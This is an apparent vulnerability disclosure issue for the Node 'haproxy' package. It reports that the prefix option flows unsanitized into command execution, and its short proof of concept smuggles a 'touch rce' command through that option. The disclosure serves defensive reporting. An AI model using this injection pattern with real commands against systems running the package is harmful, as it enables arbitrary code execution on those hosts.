Potential command injection vulnerability in haproxy

Question

Potential command injection vulnerability in haproxy

Opened this issue 2 years ago · 0 comments

Hi,

We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method fails to sanitize its opts.prefix parameter and lets it flow into a sensitive command execution API.

Here is the proof of concept.

const lib = require('haproxy');

var opts = {
 prefix: 'touch rce', 
 which: ' '
}
var a = new lib(opts)
a.orchestrator.run(['haproxy'], () => {})// a file named rce will be created

Please consider fixing it. thanks!